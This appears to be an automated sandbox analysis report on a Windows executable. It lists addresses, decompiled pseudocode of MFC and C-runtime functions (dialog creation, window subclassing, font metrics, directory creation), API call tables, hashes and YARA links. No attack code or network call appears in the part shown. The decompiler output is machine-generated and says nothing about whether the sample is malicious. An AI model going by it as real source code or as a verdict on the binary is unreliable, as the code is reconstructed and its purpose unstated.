0x0040c7b9
0x0040c7be
0x0040c7c0
0x0040c7c6
0x0040c7cc
0x0040c7cf
0x0040c7d4
0x0040c7d7
0x0040c7d9
0x0040c7dc
0x0040c7e3
0x0040c7f4
0x0040c7fa
0x0040c7fa
0x0040c800
0x0040c805
0x0040c80b
0x0040c80b
0x0040c811
0x0040c822
0x0040c825
0x0040c82a
0x0040c82d
0x0040c830
0x0040c833
0x0040c836
0x0040c83e
0x0040c841
0x0040c84c
0x0040c84e
0x0040c855
0x0040c85b
0x0040c867
0x0040c869
0x0040c86b
0x0040c86e
0x0040c87a
0x0040c87c
0x0040c885
0x0040c887
0x0040c88d
0x0040c892
0x0040c892
0x0040c887
0x0040c87c
0x0040c86e
0x0040c84e
0x0040c841
0x0040c899
0x0040c89e
0x0040c8a6
0x0040c8ab
0x0040c8ac
0x0040c8ad
0x0040c8b2
0x0040c8b7
0x0040c8b9
0x0040c8bb
0x0040c8bd
0x0040c8c1
0x0040c8c5
0x0040c8c8
0x0040c8cd
0x0040c8d1
0x0040c8d5
0x0040c8d5
0x0040c8d9
0x0040c8de
0x0040c8de
0x0040c8de
0x0040c8e0
0x0040c8e3
0x0040c8f1
0x0040c8f1
0x0040c8e3
0x0040c8f6
0x0040c919
0x0040c91c
0x0040c922
0x0040c922
0x0040c927
0x0040c92a
0x0040c931
0x0040c931
0x0040c937
0x0040c93a
0x0040c942
0x0040c945
0x0040c94a
0x0040c94a
0x0040c945
0x0040c954
0x0040c959
0x0040c95e
0x0040c961
0x0040c966
0x0040c966
0x0040c96c
0x00000000
0x0040c813
0x0040c813
0x0040c96f
0x0040c974
0x0040c974

APIs

__EH_prolog3_catch.LIBCMT ref: 0040C7B9
FindResourceA.KERNEL32(?,?,00000005), ref: 0040C7EC
LoadResource.KERNEL32(?,00000000), ref: 0040C7F4
LockResource.KERNEL32(?,00000024,004010BD), ref: 0040C805
GetDesktopWindow.USER32 ref: 0040C838
IsWindowEnabled.USER32(?), ref: 0040C846
EnableWindow.USER32(?,00000000), ref: 0040C855

Part of subcall function 00415A74: IsWindowEnabled.USER32(?), ref: 00415A7D

Part of subcall function 00415A8F: EnableWindow.USER32(?,?), ref: 00415A9C

EnableWindow.USER32(?,00000001), ref: 0040C931
GetActiveWindow.USER32 ref: 0040C93C
SetActiveWindow.USER32(?,?,00000024,004010BD), ref: 0040C94A
FreeResource.KERNEL32(?,?,00000024,004010BD), ref: 0040C966

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: e637473e8ed25ec0df4acadf4777be758bd923cb474e29ab85a1803d243357e1
Instruction ID: c0aec3e6681687ce664e6c7e1f34e81b09870f8546fced4acd886bc0c41bbf99
Opcode Fuzzy Hash: e637473e8ed25ec0df4acadf4777be758bd923cb474e29ab85a1803d243357e1
Instruction Fuzzy Hash: 6151CF70E00705CFCB21AFA6C8856AEBAB1AF48706F14463FF502B62D1CB788941CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00412522, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00412522(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E0042720D(E0043A1CE, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E00410E42(1, _t71,  *(_t71 + 0x14));
					E00412436(_t60, _t64, E00410E42(1, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E004124AC(1, _t64, _t66, E00410E42(1, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E0040FB8C(E00410E42(1, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E00411417(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E004272B2( *(_t71 - 0x14));
			}

0x00412522
0x00412522
0x00412522
0x00412529
0x0041252e
0x00412531
0x00412538
0x0041253e
0x00412542
0x00412546
0x0041254e
0x0041254f
0x00412552
0x004125fb
0x0041260d
0x00000000
0x00412558
0x00412558
0x0041255b
0x004125f3
0x00412612
0x00412614
0x00000000
0x00000000
0x0041255d
0x0041255d
0x00412560
0x004125b9
0x004125c1
0x004125cf
0x00000000
0x00412562
0x00412567
0x00412616
0x00412629
0x0041256d
0x0041257e
0x0041259b
0x004125a3
0x004125a3
0x00412567
0x00412560
0x0041255b
0x004125b0

APIs

__EH_prolog3_catch.LIBCMT ref: 00412529
GetPropA.USER32 ref: 00412538
CallWindowProcA.USER32 ref: 00412592

Part of subcall function 00411417: GetWindowRect.USER32 ref: 0041143F
Part of subcall function 00411417: GetWindow.USER32(?,00000004), ref: 0041145C

SetWindowLongA.USER32 ref: 004125B9
RemovePropA.USER32 ref: 004125C1
GlobalFindAtomA.KERNEL32 ref: 004125C8
GlobalDeleteAtom.KERNEL32 ref: 004125CF

Part of subcall function 0040FB8C: GetWindowRect.USER32 ref: 0040FB98

CallWindowProcA.USER32 ref: 00412623

Strings

AfxOldWndProc423, xrefs: 00412531, 00412536, 004125BF, 004125C7

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: de73c9b9bbed4b31c7534c8c9bcf3ec54b7ca93f9c3fc024da91e274e49d6625
Instruction ID: bfdee4dfbf5cee67ebd2cdc0bd762b011c795b2d4007a425742d0c6953707eb7
Opcode Fuzzy Hash: de73c9b9bbed4b31c7534c8c9bcf3ec54b7ca93f9c3fc024da91e274e49d6625
Instruction Fuzzy Hash: 8831417280021ABBCF11AFA5DE49DFF7A79AF49311F00412AFA01E2151C7B85D619B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042A8FD, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0042A8FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(0xc);
				_push(0x44a838);
				E00428FAC(__ebx, __edi, __esi);
				_t20 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t40 - 0x1c) = _t20;
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x44fed0;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				if(_t20 != 0) {
					_t31 = GetProcAddress;
					 *((intOrPtr*)(_t39 + 0x1f8)) = GetProcAddress(_t20, "EncodePointer");
					 *((intOrPtr*)(_t39 + 0x1fc)) = GetProcAddress( *(_t40 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x44f6d0;
				InterlockedIncrement(0x44f6d0);
				E0042E21D(_t31, 1, 0xc);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t24 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t24;
				if(_t24 == 0) {
					_t28 =  *0x44fcd8; // 0x44fc00
					 *((intOrPtr*)(_t39 + 0x6c)) = _t28;
				}
				_push( *((intOrPtr*)(_t39 + 0x6c)));
				E0042DE2C();
				 *(_t40 - 4) = 0xfffffffe;
				return E00428FF1(E0042A9A8());
			}

0x0042a8fd
0x0042a8fd
0x0042a8ff
0x0042a904
0x0042a90e
0x0042a914
0x0042a917
0x0042a91a
0x0042a924
0x0042a929
0x0042a931
0x0042a939
0x0042a949
0x0042a949
0x0042a94f
0x0042a952
0x0042a959
0x0042a965
0x0042a969
0x0042a971
0x0042a977
0x0042a97b
0x0042a97e
0x0042a983
0x0042a985
0x0042a98a
0x0042a98a
0x0042a98d
0x0042a990
0x0042a996
0x0042a9a7

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,0044A838,0000000C,0042AA0F,00000000,00000000,?,0040A3E6,?,?,00000000,00415543,0000000C,00000004,00401D16,000000FF), ref: 0042A90E
GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0042A937
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0042A947
InterlockedIncrement.KERNEL32(0044F6D0), ref: 0042A969
__lock.LIBCMT ref: 0042A971
___addlocaleref.LIBCMT ref: 0042A990

Strings

EncodePointer, xrefs: 0042A92B
DecodePointer, xrefs: 0042A93F
KERNEL32.DLL, xrefs: 0042A909

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1036688887-2843748187
Opcode ID: 021f050beb51e5ad3499312e6563df30a9bd01ad3e24d482c65bb80c07a6fc98
Instruction ID: ac861ff03db719d2c32bcb7acf636389b5b4215c4e5b963763d84be9a7104e1a
Opcode Fuzzy Hash: 021f050beb51e5ad3499312e6563df30a9bd01ad3e24d482c65bb80c07a6fc98
Instruction Fuzzy Hash: F21170B0A407019FE7109F7AE805B5ABBE0EF04314F50892FE5A9972A1CB78A950CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040C5C2(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E0042720D(E00439A81, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E0040E67F(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E0040E67F(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E004136E3(_t103, _t104, 0, _t129, _t136, 0x10);
				E004136E3(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E004272B2(_t65);
					}
					E00401FA0(_t132 - 0x1c, E004151D0());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E0042082C(_t103, _t132, __eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x452834; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E004128B9(_t103, 0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E0040C03D, 0);
							E00401E60( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E00410EEA(_t103, 0, _t131, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E004207F5(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E00420753(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E0042048B(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E0042047D(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E00404380(_t103, _t132 - 0x1c, 0, _t130, _t132, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

0x0040c5c2
0x0040c5c2
0x0040c5c2
0x0040c5c2
0x0040c5c9
0x0040c5ce
0x0040c5d0
0x0040c5d5
0x0040c5d8
0x0040c5e2
0x0040c5e2
0x0040c5ea
0x0040c5ef
0x0040c5f2
0x0040c5f5
0x0040c5f8
0x0040c602
0x0040c609
0x0040c636
0x0040c639
0x0040c639
0x0040c63b
0x0040c61d
0x0040c61d
0x0040c7aa
0x0040c7af
0x0040c7af
0x0040c646
0x0040c654
0x0040c658
0x0040c665
0x0040c66a
0x0040c670
0x0040c672
0x0040c6a8
0x0040c6a8
0x0040c6aa
0x0040c6eb
0x0040c6eb
0x0040c6ef
0x0040c6f4
0x0040c6f9
0x0040c6fc
0x0040c6fe
0x0040c704
0x0040c700
0x0040c700
0x0040c700
0x0040c71e
0x0040c720
0x0040c725
0x0040c747
0x0040c74a
0x0040c74c
0x0040c754
0x0040c757
0x0040c759
0x0040c760
0x0040c760
0x0040c759
0x0040c766
0x0040c76b
0x0040c76d
0x0040c773
0x0040c773
0x0040c779
0x0040c77b
0x0040c77d
0x0040c781
0x0040c784
0x0040c78a
0x0040c78a
0x0040c78a
0x0040c781
0x0040c78c
0x0040c78f
0x0040c794
0x0040c79d
0x0040c79d
0x0040c7a5
0x0040c7a7
0x0040c7a7
0x0040c7a7
0x00000000
0x0040c7a7
0x0040c6ac
0x0040c6b0
0x0040c6bb
0x0040c6bf
0x0040c6cf
0x0040c6d2
0x0040c6d6
0x0040c6db
0x0040c6de
0x0040c6e9
0x0040c6e9
0x00000000
0x0040c6de
0x0040c674
0x0040c676
0x00000000
0x00000000
0x0040c680
0x0040c682
0x00000000
0x00000000
0x0040c68c
0x0040c693
0x0040c698
0x0040c69a
0x0040c69c
0x00000000
0x00000000
0x0040c69e
0x0040c6a3
0x0040c6a5
0x0040c6a5
0x00000000
0x0040c6a3
0x0040c610
0x0040c61b
0x0040c632
0x00000000
0x0040c632
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 0040C5C9
GetSystemMetrics.USER32 ref: 0040C67A
GlobalLock.KERNEL32 ref: 0040C6E3
CreateDialogIndirectParamA.USER32(?,?,?,0040C03D,00000000), ref: 0040C712

Strings

MS Shell Dlg, xrefs: 0040C684

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: a8a78dc2d76d7c15ad8fe3f8d38a6a903b3cbf7a28eda4d7a5da45efedc8f5e5
Instruction ID: 8d727f5c5daf2b7b7bf3098bc2b4be594ae673baacaf6d2d76154edb8875a645
Opcode Fuzzy Hash: a8a78dc2d76d7c15ad8fe3f8d38a6a903b3cbf7a28eda4d7a5da45efedc8f5e5
Instruction Fuzzy Hash: 9951B030A00205DBCF25EFA4D8859EEBBB4AF54304F64167BF402B72D2DB799940CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00420753, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00420753(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x44f5d0; // 0x765b253d
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E0042569C(E00420604(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00420759
0x00420760
0x00420765
0x0042076e
0x00420771
0x00420774
0x00420779
0x0042077d
0x00420787
0x00420796
0x0042079a
0x004207a7
0x004207a9
0x004207ab
0x004207ab
0x004207c6
0x004207c9
0x004207c9
0x004207cf
0x004207cf
0x004207d5
0x004207d7
0x004207d7
0x004207f2
0x004207f2
0x00420781
0x00420785
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 00420779
GetStockObject.GDI32(0000000D), ref: 00420781
GetObjectA.GDI32(00000000,0000003C,?), ref: 0042078E
GetDC.USER32(00000000), ref: 0042079D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004207B1
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 004207BD
ReleaseDC.USER32 ref: 004207C9

Strings

System, xrefs: 00420774, 004207DE

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: c66d852441c80abb85514858839544e89a703d4f172f04c2748990db0a396752
Instruction ID: 956cba166631f25309d8d802c2fb3e49d2d6870a16422e54b61b5f31f26dd623
Opcode Fuzzy Hash: c66d852441c80abb85514858839544e89a703d4f172f04c2748990db0a396752
Instruction Fuzzy Hash: 39115471B41228EBEB149BA1ED45FAE77B8FF54B45F40002AF601E6181DB74AD05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004025E0, Relevance: 13.8, APIs: 9, Instructions: 322
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004025E0(signed int __edx) {
				int _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				int _v28;
				char _v44;
				char _v48;
				intOrPtr _v52;
				int _v56;
				signed int _v72;
				char _v76;
				int _v80;
				short _v84;
				short _v88;
				int _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed int _t132;
				intOrPtr* _t134;
				int _t138;
				signed int _t139;
				short _t142;
				CHAR* _t154;
				signed int _t155;
				void* _t161;
				signed int _t164;
				signed int* _t169;
				intOrPtr _t172;
				char* _t174;
				char* _t175;
				short* _t176;
				signed int _t181;
				char* _t182;
				signed int* _t193;
				signed int* _t194;
				signed int _t199;
				char* _t200;
				void* _t201;
				int _t202;
				signed int _t203;
				signed int _t214;
				intOrPtr _t215;
				void* _t216;
				short* _t217;
				void* _t220;
				signed int _t222;
				int _t223;
				int _t224;
				void* _t225;
				signed int _t226;
				char* _t227;
				signed int _t231;
				signed int _t233;
				void* _t234;
				char* _t235;
				void* _t247;
				signed int _t255;

				_t211 = __edx;
				_push(0xffffffff);
				_push(E0043BB78);
				_push( *[fs:0x0]);
				_t235 = _t234 - 0x58;
				_t131 =  *0x44f5d0; // 0x765b253d
				_t132 = _t131 ^ _t233;
				_v20 = _t132;
				_push(_t132);
				 *[fs:0x0] =  &_v16;
				_t214 = 0;
				_t134 = __edx;
				_v52 = 7;
				_v56 = 0;
				_v72 = 0;
				_t220 = __edx + 2;
				do {
					_t203 =  *_t134;
					_t134 = _t134 + 2;
				} while (_t203 != 0);
				E004044B0( &_v76, __edx, _t134 - _t220 >> 1);
				_v8 = 0;
				_t138 = _v56;
				_t222 = _t138 - 1;
				if(_t222 > _t138) {
					E00426095();
				}
				_t139 = _v72;
				if(_v52 < 8) {
					_t139 =  &_v72;
				}
				if( *((short*)(_t139 + _t222 * 2)) != 0x5c) {
					_t243 = (_t139 | 0xffffffff) - _v56 - 1;
					if((_t139 | 0xffffffff) - _v56 <= 1) {
						E00439257(8, _t214, _t222, _t243);
					}
					_t214 = _v56 + 1;
					if(E00404230( &_v76, 8, _t214) != 0) {
						_t193 = _v72;
						if(_v52 < 8) {
							_t193 =  &_v72;
						}
						_t203 = _v56;
						 *((short*)(_t193 + _t203 * 2)) = 0x5c;
						_t194 = _v72;
						_v56 = _t214;
						if(_v52 < 8) {
							_t194 =  &_v72;
						}
						 *((short*)(_t194 + _t214 * 2)) = 0;
					}
				}
				_t199 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v24 = 7;
				_v28 = 0;
				_v44 = 0;
				_v8 = 2;
				_t247 = 0 - _v56;
				_v80 = 0;
				if(_t247 >= 0) {
					L51:
					_t223 = _v92;
					if(_t223 > _v88) {
						E00426095();
					}
					_t200 =  &_v96;
					_v104 = _t200;
					while(1) {
						_t215 = _v88;
						_v100 = _t223;
						if(_v92 > _t215) {
							E00426095();
						}
						_t142 = 0;
						if(_t200 == 0 || _t200 !=  &_v96) {
							E00426095();
							_t142 = 0;
						}
						if(_t223 == _t215) {
							break;
						}
						_v80 =  *0x45082c();
						if(_t200 == 0) {
							E00426095();
						}
						if(_t223 >=  *((intOrPtr*)(_t200 + 8))) {
							E00426095();
						}
						if( *((intOrPtr*)(_t223 + 0x18)) < 8) {
							_t217 = _t223 + 4;
						} else {
							_t217 =  *(_t223 + 4);
						}
						if(_t217 == 0) {
							L76:
							_t154 = 0;
							__eflags = 0;
							goto L77;
						} else {
							_t161 = lstrlenW(_t217) + 1;
							if(_t161 > 0x3fffffff) {
								goto L76;
							}
							_t202 = _t161 + _t161;
							E004299F0(_t202);
							_t227 = _t235;
							if(_t227 == 0) {
								_t200 = _v104;
								_t223 = _v100;
								goto L76;
							}
							_t211 = _v80;
							 *_t227 = 0;
							_t164 = WideCharToMultiByte(_v80, 0, _t217, 0xffffffff, _t227, _t202, 0, 0);
							_t200 = _v104;
							asm("sbb eax, eax");
							_t154 =  ~_t164 & _t227;
							_t223 = _v100;
							L77:
							_t155 = CreateDirectoryA(_t154, 0);
							asm("sbb eax, eax");
							_v80 =  ~( ~_t155);
							if(_t223 >=  *((intOrPtr*)(_t200 + 8))) {
								E00426095();
							}
							_t223 = _t223 + 0x1c;
							continue;
						}
					}
					_v8 = 1;
					__eflags = _v24 - 8;
					if(__eflags >= 0) {
						_push(_v44);
						E0040A3F2(_t200, _t211, _t215, _t223, __eflags);
						_t235 =  &(_t235[4]);
						_t142 = 0;
						__eflags = 0;
					}
					_v8 = 0;
					_t224 = _v92;
					__eflags = _t224 - _t142;
					_v24 = 7;
					_v28 = _t142;
					_v44 = _t142;
					if(_t224 == _t142) {
						L89:
						_v8 = 0xffffffff;
						__eflags = _v52 - 8;
						_v92 = _t142;
						_v88 = _t142;
						_v84 = _t142;
						if(__eflags >= 0) {
							_push(_v72);
							E0040A3F2(_t200, _t211, _t215, _t224, __eflags);
						}
						 *[fs:0x0] = _v16;
						_pop(_t216);
						_pop(_t225);
						_pop(_t201);
						__eflags = _v20 ^ _t233;
